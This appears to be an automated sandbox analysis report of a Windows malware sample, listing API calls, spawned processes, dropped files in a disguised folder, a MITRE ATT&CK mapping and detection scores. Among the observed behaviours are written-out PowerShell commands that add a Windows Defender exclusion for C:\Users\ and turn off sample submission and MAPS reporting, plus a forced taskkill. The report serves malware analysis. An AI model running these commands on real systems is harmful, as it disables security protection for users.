5_2_00007FF64B93FF1F

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B938CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,

5_2_00007FF64B938CFC

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B931131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	5_2_00007FF64B931131
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B94B6A0 SetUnhandledExceptionFilter,	5_2_00007FF64B94B6A0
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	Code function: 5_2_00007FF64B9405D9 SetUnhandledExceptionFilter,	5_2_00007FF64B9405D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FF7C1AB1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	23_2_00007FF7C1AB1131

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

5_2_00007FF64B93292E

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Process created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe

Code function: 5_2_00007FF64B936FD5 GetSystemTimeAsFileTime,

5_2_00007FF64B936FD5

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: 23_2_00007FFE11506DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

23_2_00007FFE11506DA3

Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.31.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.31.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.31.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: cwjk513wjc7a1mlgh3.exe, 00000005.00000002.1754874180.000002C49AA18000.00000004.00000020.00020000.00000000.sdmp, Amcache.hve.31.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE115058DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE115058DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11BDAEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE11BDAEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE11EC1F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE11EC1F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126E28BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE126E28BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126FB820 listen,htons,recv,select,	23_2_00007FFE126FB820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE126FB7E8 bind,	23_2_00007FFE126FB7E8
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A4F418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE1A4F418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 23_2_00007FFE1A5215FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	23_2_00007FFE1A5215FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: 32_2_00007FFE117758DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,	32_2_00007FFE117758DA

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 Network Sniffing	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	2 Valid Accounts	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Create Account	2 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Service Execution	2 Valid Accounts	4 Windows Service	1 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	4 Windows Service	11 Process Injection	1 Timestomp	LSA Secrets	1 Network Sniffing	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	1 Services File Permissions Weakness	1 Services File Permissions Weakness	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	1 Proxy	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	1 Network Share Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Masquerading	Proc Filesystem	131 Security Software Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	31 Virtualization/Sandbox Evasion	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Access Token Manipulation	Network Sniffing	2 Process Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	31 Virtualization/Sandbox Evasion	Input Capture	1 Application Window Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	11 Process Injection	Keylogging	1 System Owner/User Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	1 System Network Configuration Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Services File Permissions Weakness	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	100%	Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	0%	ReversingLabs
